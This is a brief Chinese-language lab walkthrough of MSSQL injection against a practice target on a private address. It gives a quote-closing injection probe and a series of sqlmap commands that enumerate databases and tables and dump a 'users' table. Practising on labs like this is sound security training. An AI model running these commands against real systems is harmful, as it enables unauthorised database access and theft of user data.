简介
SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。
以下是MSSQL手工注入的流程:
一、打开靶场选择第一关
二、确定注入点
测试不同的闭合方式
这里确定为 id=1' --+
三、查找是否存在 sql 漏洞
使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞
四、查找库名
使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch
五、查找表名
使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch
六、得到表中的数据
使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch
